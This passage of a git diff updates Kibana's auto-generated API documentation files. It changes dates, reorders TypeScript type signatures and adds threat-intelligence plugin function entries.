\"false\" | \"true\" | undefined; 'aria-invalid'?: boolean | \"false\" | \"true\" | \"grammar\" | \"spelling\" | undefined; 'aria-keyshortcuts'?: string | undefined; 'aria-label'?: string | undefined; 'aria-labelledby'?: string | undefined; 'aria-level'?: number | undefined; 'aria-live'?: \"off\" | \"assertive\" | \"polite\" | undefined; 'aria-modal'?: boolean | \"false\" | \"true\" | undefined; 'aria-multiline'?: boolean | \"false\" | \"true\" | undefined; 'aria-multiselectable'?: boolean | \"false\" | \"true\" | undefined; 'aria-orientation'?: \"horizontal\" | \"vertical\" | undefined; 'aria-owns'?: string | undefined; 'aria-placeholder'?: string | undefined; 'aria-posinset'?: number | undefined; 'aria-pressed'?: boolean | \"mixed\" | \"false\" | \"true\" | undefined; 'aria-readonly'?: boolean | \"false\" | \"true\" | undefined; 'aria-relevant'?: \"all\" | \"text\" | \"additions\" | \"additions removals\" | \"additions text\" | \"removals\" | \"removals additions\" | \"removals text\" | \"text additions\" | \"text removals\" | undefined; 'aria-required'?: boolean | \"false\" | \"true\" | undefined; 'aria-roledescription'?: string | undefined; 'aria-rowcount'?: number | undefined; 'aria-rowindex'?: number | undefined; 'aria-rowspan'?: number | undefined; 'aria-selected'?: boolean | \"false\" | \"true\" | undefined; 'aria-setsize'?: number | undefined; 'aria-sort'?: \"none\" | \"other\" | \"ascending\" | \"descending\" | undefined; 'aria-valuemax'?: number | undefined; 'aria-valuemin'?: number | undefined; 'aria-valuenow'?: number | undefined; 'aria-valuetext'?: string | undefined; dangerouslySetInnerHTML?: { __html: string; } | undefined; onCopy?: React.ClipboardEventHandler | undefined; onCopyCapture?: React.ClipboardEventHandler | undefined; onCut?: React.ClipboardEventHandler | undefined; onCutCapture?: React.ClipboardEventHandler | undefined; onPaste?: React.ClipboardEventHandler | undefined; onPasteCapture?: React.ClipboardEventHandler | undefined; 
onCompositionEnd?: React.CompositionEventHandler | undefined; onCompositionEndCapture?: React.CompositionEventHandler | undefined; onCompositionStart?: React.CompositionEventHandler | undefined; onCompositionStartCapture?: React.CompositionEventHandler | undefined; onCompositionUpdate?: React.CompositionEventHandler | undefined; onCompositionUpdateCapture?: React.CompositionEventHandler | undefined; onFocus?: React.FocusEventHandler | undefined; onFocusCapture?: React.FocusEventHandler | undefined; onBlur?: React.FocusEventHandler | undefined; onBlurCapture?: React.FocusEventHandler | undefined; onChangeCapture?: React.FormEventHandler | undefined; onBeforeInput?: React.FormEventHandler | undefined; onBeforeInputCapture?: React.FormEventHandler | undefined; onInput?: React.FormEventHandler | undefined; onInputCapture?: React.FormEventHandler | undefined; onReset?: React.FormEventHandler | undefined; onResetCapture?: React.FormEventHandler | undefined; onSubmit?: React.FormEventHandler | undefined; onSubmitCapture?: React.FormEventHandler | undefined; onInvalid?: React.FormEventHandler | undefined; onInvalidCapture?: React.FormEventHandler | undefined; onLoad?: React.ReactEventHandler | undefined; onLoadCapture?: React.ReactEventHandler | undefined; onErrorCapture?: React.ReactEventHandler | undefined; onKeyDownCapture?: React.KeyboardEventHandler | undefined; onKeyPress?: React.KeyboardEventHandler | undefined; onKeyPressCapture?: React.KeyboardEventHandler | undefined; onKeyUp?: React.KeyboardEventHandler | undefined; onKeyUpCapture?: React.KeyboardEventHandler | undefined; onAbort?: React.ReactEventHandler | undefined; onAbortCapture?: React.ReactEventHandler | undefined; onCanPlay?: React.ReactEventHandler | undefined; onCanPlayCapture?: React.ReactEventHandler | undefined; onCanPlayThrough?: React.ReactEventHandler | undefined; onCanPlayThroughCapture?: React.ReactEventHandler | undefined; onDurationChange?: React.ReactEventHandler | undefined; 
onDurationChangeCapture?: React.ReactEventHandler | undefined; onEmptied?: React.ReactEventHandler | undefined; onEmptiedCapture?: React.ReactEventHandler | undefined; onEncrypted?: React.ReactEventHandler | undefined; onEncryptedCapture?: React.ReactEventHandler | undefined; onEnded?: React.ReactEventHandler | undefined; onEndedCapture?: React.ReactEventHandler | undefined; onLoadedData?: React.ReactEventHandler | undefined; onLoadedDataCapture?: React.ReactEventHandler | undefined; onLoadedMetadata?: React.ReactEventHandler | undefined; onLoadedMetadataCapture?: React.ReactEventHandler | undefined; onLoadStart?: React.ReactEventHandler | undefined; onLoadStartCapture?: React.ReactEventHandler | undefined; onPause?: React.ReactEventHandler | undefined; onPauseCapture?: React.ReactEventHandler | undefined; onPlay?: React.ReactEventHandler | undefined; onPlayCapture?: React.ReactEventHandler | undefined; onPlaying?: React.ReactEventHandler | undefined; onPlayingCapture?: React.ReactEventHandler | undefined; onProgress?: React.ReactEventHandler | undefined; onProgressCapture?: React.ReactEventHandler | undefined; onRateChange?: React.ReactEventHandler | undefined; onRateChangeCapture?: React.ReactEventHandler | undefined; onSeeked?: React.ReactEventHandler | undefined; onSeekedCapture?: React.ReactEventHandler | undefined; onSeeking?: React.ReactEventHandler | undefined; onSeekingCapture?: React.ReactEventHandler | undefined; onStalled?: React.ReactEventHandler | undefined; onStalledCapture?: React.ReactEventHandler | undefined; onSuspend?: React.ReactEventHandler | undefined; onSuspendCapture?: React.ReactEventHandler | undefined; onTimeUpdate?: React.ReactEventHandler | undefined; onTimeUpdateCapture?: React.ReactEventHandler | undefined; onVolumeChange?: React.ReactEventHandler | undefined; onVolumeChangeCapture?: React.ReactEventHandler | undefined; onWaiting?: React.ReactEventHandler | undefined; onWaitingCapture?: React.ReactEventHandler | undefined; 
onAuxClick?: React.MouseEventHandler | undefined; onAuxClickCapture?: React.MouseEventHandler | undefined; onClickCapture?: React.MouseEventHandler | undefined; onContextMenu?: React.MouseEventHandler | undefined; onContextMenuCapture?: React.MouseEventHandler | undefined; onDoubleClick?: React.MouseEventHandler | undefined; onDoubleClickCapture?: React.MouseEventHandler | undefined; onDrag?: React.DragEventHandler | undefined; onDragCapture?: React.DragEventHandler | undefined; onDragEnd?: React.DragEventHandler | undefined; onDragEndCapture?: React.DragEventHandler | undefined; onDragEnter?: React.DragEventHandler | undefined; onDragEnterCapture?: React.DragEventHandler | undefined; onDragExit?: React.DragEventHandler | undefined; onDragExitCapture?: React.DragEventHandler | undefined; onDragLeave?: React.DragEventHandler | undefined; onDragLeaveCapture?: React.DragEventHandler | undefined; onDragOver?: React.DragEventHandler | undefined; onDragOverCapture?: React.DragEventHandler | undefined; onDragStart?: React.DragEventHandler | undefined; onDragStartCapture?: React.DragEventHandler | undefined; onDrop?: React.DragEventHandler | undefined; onDropCapture?: React.DragEventHandler | undefined; onMouseDown?: React.MouseEventHandler | undefined; onMouseDownCapture?: React.MouseEventHandler | undefined; onMouseEnter?: React.MouseEventHandler | undefined; onMouseLeave?: React.MouseEventHandler | undefined; onMouseMove?: React.MouseEventHandler | undefined; onMouseMoveCapture?: React.MouseEventHandler | undefined; onMouseOut?: React.MouseEventHandler | undefined; onMouseOutCapture?: React.MouseEventHandler | undefined; onMouseOver?: React.MouseEventHandler | undefined; onMouseOverCapture?: React.MouseEventHandler | undefined; onMouseUp?: React.MouseEventHandler | undefined; onMouseUpCapture?: React.MouseEventHandler | undefined; onSelect?: React.ReactEventHandler | undefined; onSelectCapture?: React.ReactEventHandler | undefined; onTouchCancel?: 
React.TouchEventHandler | undefined; onTouchCancelCapture?: React.TouchEventHandler | undefined; onTouchEnd?: React.TouchEventHandler | undefined; onTouchEndCapture?: React.TouchEventHandler | undefined; onTouchMove?: React.TouchEventHandler | undefined; onTouchMoveCapture?: React.TouchEventHandler | undefined; onTouchStart?: React.TouchEventHandler | undefined; onTouchStartCapture?: React.TouchEventHandler | undefined; onPointerDown?: React.PointerEventHandler | undefined; onPointerDownCapture?: React.PointerEventHandler | undefined; onPointerMove?: React.PointerEventHandler | undefined; onPointerMoveCapture?: React.PointerEventHandler | undefined; onPointerUp?: React.PointerEventHandler | undefined; onPointerUpCapture?: React.PointerEventHandler | undefined; onPointerCancel?: React.PointerEventHandler | undefined; onPointerCancelCapture?: React.PointerEventHandler | undefined; onPointerEnter?: React.PointerEventHandler | undefined; onPointerEnterCapture?: React.PointerEventHandler | undefined; onPointerLeave?: React.PointerEventHandler | undefined; onPointerLeaveCapture?: React.PointerEventHandler | undefined; onPointerOver?: React.PointerEventHandler | undefined; onPointerOverCapture?: React.PointerEventHandler | undefined; onPointerOut?: React.PointerEventHandler | undefined; onPointerOutCapture?: React.PointerEventHandler | undefined; onGotPointerCapture?: React.PointerEventHandler | undefined; onGotPointerCaptureCapture?: React.PointerEventHandler | undefined; onLostPointerCapture?: React.PointerEventHandler | undefined; onLostPointerCaptureCapture?: React.PointerEventHandler | undefined; onScroll?: React.UIEventHandler | undefined; onScrollCapture?: React.UIEventHandler | undefined; onWheel?: React.WheelEventHandler | undefined; onWheelCapture?: React.WheelEventHandler | undefined; onAnimationStart?: React.AnimationEventHandler | undefined; onAnimationStartCapture?: React.AnimationEventHandler | undefined; onAnimationEnd?: React.AnimationEventHandler | 
undefined; onAnimationEndCapture?: React.AnimationEventHandler | undefined; onAnimationIteration?: React.AnimationEventHandler | undefined; onAnimationIterationCapture?: React.AnimationEventHandler | undefined; onTransitionEnd?: React.TransitionEventHandler | undefined; onTransitionEndCapture?: React.TransitionEventHandler | undefined; 'data-test-subj'?: string | undefined; height?: string | number | undefined; width?: string | undefined; readOnly?: boolean | undefined; align?: ", "HorizontalAlignment", " | undefined; abbr?: string | undefined; footer?: string | React.ReactElement> | ((props: ", "EuiTableFooterProps", @@ -306,7 +306,7 @@ "section": "def-public.SavedObjectsManagementRecord", "text": "SavedObjectsManagementRecord" }, - ">) => React.ReactNode) | undefined; colSpan?: number | undefined; headers?: string | undefined; rowSpan?: number | undefined; scope?: string | undefined; valign?: \"baseline\" | \"middle\" | \"top\" | \"bottom\" | undefined; dataType?: ", + ">) => React.ReactNode) | undefined; colSpan?: number | undefined; headers?: string | undefined; rowSpan?: number | undefined; scope?: string | undefined; valign?: \"top\" | \"bottom\" | \"middle\" | \"baseline\" | undefined; dataType?: ", "EuiTableDataType", " | undefined; isExpander?: boolean | undefined; textOnly?: boolean | undefined; truncateText?: boolean | undefined; mobileOptions?: (Omit<", "EuiTableRowCellMobileOptionsShape", diff --git a/api_docs/saved_objects_management.mdx b/api_docs/saved_objects_management.mdx index f5dacafad1ec1..9af762e3cfda2 100644 --- a/api_docs/saved_objects_management.mdx +++ b/api_docs/saved_objects_management.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedObjectsManagement title: "savedObjectsManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the savedObjectsManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedObjectsManagement'] --- import savedObjectsManagementObj from './saved_objects_management.devdocs.json'; diff --git a/api_docs/saved_objects_tagging.devdocs.json b/api_docs/saved_objects_tagging.devdocs.json index 2cc307c5a8bb8..0ed05dcb1409e 100644 --- a/api_docs/saved_objects_tagging.devdocs.json +++ b/api_docs/saved_objects_tagging.devdocs.json @@ -1173,7 +1173,7 @@ "label": "errors", "description": [], "signature": [ - "{ color?: string | undefined; id?: string | undefined; name?: string | undefined; description?: string | undefined; }" + "{ color?: string | undefined; id?: string | undefined; description?: string | undefined; name?: string | undefined; }" ], "path": "x-pack/plugins/saved_objects_tagging/common/validation.ts", "deprecated": false diff --git a/api_docs/saved_objects_tagging.mdx b/api_docs/saved_objects_tagging.mdx index 8e04730b5ae12..97b5caa86734b 100644 --- a/api_docs/saved_objects_tagging.mdx +++ b/api_docs/saved_objects_tagging.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedObjectsTagging title: "savedObjectsTagging" image: https://source.unsplash.com/400x175/?github description: API docs for the savedObjectsTagging plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedObjectsTagging'] --- import savedObjectsTaggingObj from './saved_objects_tagging.devdocs.json'; diff --git a/api_docs/saved_objects_tagging_oss.mdx b/api_docs/saved_objects_tagging_oss.mdx index 9e9f58f1f35ac..99a6a16692913 100644 --- a/api_docs/saved_objects_tagging_oss.mdx +++ b/api_docs/saved_objects_tagging_oss.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedObjectsTaggingOss title: "savedObjectsTaggingOss" image: https://source.unsplash.com/400x175/?github description: API docs for the savedObjectsTaggingOss plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedObjectsTaggingOss'] --- import savedObjectsTaggingOssObj from './saved_objects_tagging_oss.devdocs.json'; diff --git a/api_docs/saved_search.mdx b/api_docs/saved_search.mdx index 909dcde427f6e..b68e01356a8f1 100644 --- a/api_docs/saved_search.mdx +++ b/api_docs/saved_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedSearch title: "savedSearch" image: https://source.unsplash.com/400x175/?github description: API docs for the savedSearch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedSearch'] --- import savedSearchObj from './saved_search.devdocs.json'; diff --git a/api_docs/screenshot_mode.mdx b/api_docs/screenshot_mode.mdx index a6ce61befa1c9..13c646152f5f5 100644 --- a/api_docs/screenshot_mode.mdx +++ b/api_docs/screenshot_mode.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/screenshotMode title: "screenshotMode" image: https://source.unsplash.com/400x175/?github description: API docs for the screenshotMode plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'screenshotMode'] --- import screenshotModeObj from './screenshot_mode.devdocs.json'; diff --git a/api_docs/screenshotting.mdx b/api_docs/screenshotting.mdx index 12c44e2938c05..bbc09d7885d48 100644 --- a/api_docs/screenshotting.mdx +++ b/api_docs/screenshotting.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/screenshotting title: "screenshotting" image: https://source.unsplash.com/400x175/?github description: API docs for the screenshotting plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'screenshotting'] --- import screenshottingObj from './screenshotting.devdocs.json'; 
diff --git a/api_docs/security.mdx b/api_docs/security.mdx index 3b57fa603d456..70bfc2aaadf3c 100644 --- a/api_docs/security.mdx +++ b/api_docs/security.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/security title: "security" image: https://source.unsplash.com/400x175/?github description: API docs for the security plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'security'] --- import securityObj from './security.devdocs.json'; diff --git a/api_docs/security_solution.mdx b/api_docs/security_solution.mdx index f8802061c5df8..6c7bbf1b7b79a 100644 --- a/api_docs/security_solution.mdx +++ b/api_docs/security_solution.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/securitySolution title: "securitySolution" image: https://source.unsplash.com/400x175/?github description: API docs for the securitySolution plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'securitySolution'] --- import securitySolutionObj from './security_solution.devdocs.json'; diff --git a/api_docs/session_view.mdx b/api_docs/session_view.mdx index dfff2e52fd8e8..3763185a95fcf 100644 --- a/api_docs/session_view.mdx +++ b/api_docs/session_view.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/sessionView title: "sessionView" image: https://source.unsplash.com/400x175/?github description: API docs for the sessionView plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'sessionView'] --- import sessionViewObj from './session_view.devdocs.json'; diff --git a/api_docs/share.mdx b/api_docs/share.mdx index 110eb4d80a626..a71f9aae70c57 100644 --- a/api_docs/share.mdx +++ b/api_docs/share.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/share title: "share" image: https://source.unsplash.com/400x175/?github description: API docs for the share plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'share'] --- import shareObj from './share.devdocs.json'; 
diff --git a/api_docs/shared_u_x.mdx b/api_docs/shared_u_x.mdx index 1c385a74472d6..ad5791ed00674 100644 --- a/api_docs/shared_u_x.mdx +++ b/api_docs/shared_u_x.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/sharedUX title: "sharedUX" image: https://source.unsplash.com/400x175/?github description: API docs for the sharedUX plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'sharedUX'] --- import sharedUXObj from './shared_u_x.devdocs.json'; diff --git a/api_docs/snapshot_restore.mdx b/api_docs/snapshot_restore.mdx index d956e6d9835a0..670740f05c60d 100644 --- a/api_docs/snapshot_restore.mdx +++ b/api_docs/snapshot_restore.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/snapshotRestore title: "snapshotRestore" image: https://source.unsplash.com/400x175/?github description: API docs for the snapshotRestore plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'snapshotRestore'] --- import snapshotRestoreObj from './snapshot_restore.devdocs.json'; diff --git a/api_docs/spaces.devdocs.json b/api_docs/spaces.devdocs.json index b9471fcdf12a3..16599343be1d9 100644 --- a/api_docs/spaces.devdocs.json +++ b/api_docs/spaces.devdocs.json @@ -1706,7 +1706,7 @@ "The size of the avatar." ], "signature": [ - "\"s\" | \"m\" | \"l\" | \"xl\" | undefined" + "\"m\" | \"s\" | \"l\" | \"xl\" | undefined" ], "path": "x-pack/plugins/spaces/public/space_avatar/types.ts", "deprecated": false diff --git a/api_docs/spaces.mdx b/api_docs/spaces.mdx index 4cbc8a22b2150..62952da669590 100644 --- a/api_docs/spaces.mdx +++ b/api_docs/spaces.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/spaces title: "spaces" image: https://source.unsplash.com/400x175/?github description: API docs for the spaces plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'spaces'] --- import spacesObj from './spaces.devdocs.json'; 
diff --git a/api_docs/stack_alerts.mdx b/api_docs/stack_alerts.mdx index 0320e317e77f0..ab426457b895b 100644 --- a/api_docs/stack_alerts.mdx +++ b/api_docs/stack_alerts.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/stackAlerts title: "stackAlerts" image: https://source.unsplash.com/400x175/?github description: API docs for the stackAlerts plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'stackAlerts'] --- import stackAlertsObj from './stack_alerts.devdocs.json'; diff --git a/api_docs/task_manager.devdocs.json b/api_docs/task_manager.devdocs.json index 73a212331c1c6..5b232995d8816 100644 --- a/api_docs/task_manager.devdocs.json +++ b/api_docs/task_manager.devdocs.json @@ -1437,7 +1437,7 @@ "TaskScheduling", ", \"schedule\" | \"runSoon\" | \"ephemeralRunNow\" | \"ensureScheduled\" | \"bulkUpdateSchedules\" | \"bulkSchedule\"> & Pick<", "TaskStore", - ", \"aggregate\" | \"fetch\" | \"get\" | \"remove\"> & { removeIfExists: (id: string) => Promise; } & { supportsEphemeralTasks: () => boolean; }" + ", \"get\" | \"aggregate\" | \"fetch\" | \"remove\"> & { removeIfExists: (id: string) => Promise; } & { supportsEphemeralTasks: () => boolean; }" ], "path": "x-pack/plugins/task_manager/server/plugin.ts", "deprecated": false, diff --git a/api_docs/task_manager.mdx b/api_docs/task_manager.mdx index e3f379a681467..66c7ef925b61d 100644 --- a/api_docs/task_manager.mdx +++ b/api_docs/task_manager.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/taskManager title: "taskManager" image: https://source.unsplash.com/400x175/?github description: API docs for the taskManager plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'taskManager'] --- import taskManagerObj from './task_manager.devdocs.json'; diff --git a/api_docs/telemetry.mdx b/api_docs/telemetry.mdx index 31a189b693dbe..b3fae06483c12 100644 --- a/api_docs/telemetry.mdx +++ b/api_docs/telemetry.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/telemetry title: "telemetry" image: https://source.unsplash.com/400x175/?github description: API docs for the telemetry plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'telemetry'] --- import telemetryObj from './telemetry.devdocs.json'; diff --git a/api_docs/telemetry_collection_manager.devdocs.json b/api_docs/telemetry_collection_manager.devdocs.json index d1a6df2c7957b..5d4bfd39478e6 100644 --- a/api_docs/telemetry_collection_manager.devdocs.json +++ b/api_docs/telemetry_collection_manager.devdocs.json 
@@ -72,7 +72,61 @@ "label": "esClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -140,7 +190,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -166,33 +216,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -218,33 +242,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1204,6 +1202,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/telemetry_collection_manager.mdx b/api_docs/telemetry_collection_manager.mdx index a35e2503cb77e..49752eca42ae4 100644 --- a/api_docs/telemetry_collection_manager.mdx +++ b/api_docs/telemetry_collection_manager.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/telemetryCollectionManager title: "telemetryCollectionManager" image: https://source.unsplash.com/400x175/?github description: API docs for the telemetryCollectionManager plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'telemetryCollectionManager'] --- import telemetryCollectionManagerObj from './telemetry_collection_manager.devdocs.json'; diff --git a/api_docs/telemetry_collection_xpack.mdx b/api_docs/telemetry_collection_xpack.mdx index bad2b8b8e5df3..7c92a43c73b32 100644 --- a/api_docs/telemetry_collection_xpack.mdx +++ b/api_docs/telemetry_collection_xpack.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/telemetryCollectionXpack title: "telemetryCollectionXpack" image: https://source.unsplash.com/400x175/?github description: API docs for the telemetryCollectionXpack plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'telemetryCollectionXpack'] --- import telemetryCollectionXpackObj from './telemetry_collection_xpack.devdocs.json'; diff --git a/api_docs/telemetry_management_section.mdx b/api_docs/telemetry_management_section.mdx index cbc7b76b0e1d2..4f313ef00203d 100644 --- a/api_docs/telemetry_management_section.mdx +++ b/api_docs/telemetry_management_section.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/telemetryManagementSection title: "telemetryManagementSection" image: https://source.unsplash.com/400x175/?github description: API docs for the telemetryManagementSection plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'telemetryManagementSection'] --- import telemetryManagementSectionObj from './telemetry_management_section.devdocs.json'; diff --git a/api_docs/threat_intelligence.devdocs.json b/api_docs/threat_intelligence.devdocs.json index 3b277318045fe..380afebb238bf 100644 --- a/api_docs/threat_intelligence.devdocs.json +++ b/api_docs/threat_intelligence.devdocs.json 
@@ -2,7 +2,135 @@ "id": "threatIntelligence", "client": { "classes": [], - "functions": [], + "functions": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionDeepLink", + "type": "Function", + "tags": [], + "label": "getSecuritySolutionDeepLink", + "description": [ + "\nGets the threat intelligence properties of a TI page for deep linking in the security solution." + ], + "signature": [ + "(threatIntelligencePage: \"indicators\") => TIDeepLink" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "children": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionDeepLink.$1", + "type": "string", + "tags": [], + "label": "threatIntelligencePage", + "description": [ + "the name of the threat intelligence page." + ], + "signature": [ + "\"indicators\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [ + "a {@link TIDeepLink }" + ], + "initialIsOpen": false + }, + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionLink", + "type": "Function", + "tags": [], + "label": "getSecuritySolutionLink", + "description": [ + "\nGets the threat intelligence properties of a TI page for navigation in the security solution." + ], + "signature": [ + "(threatIntelligencePage: \"indicators\") => TILinkItem" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "children": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionLink.$1", + "type": "string", + "tags": [], + "label": "threatIntelligencePage", + "description": [ + "the name of the threat intelligence page." 
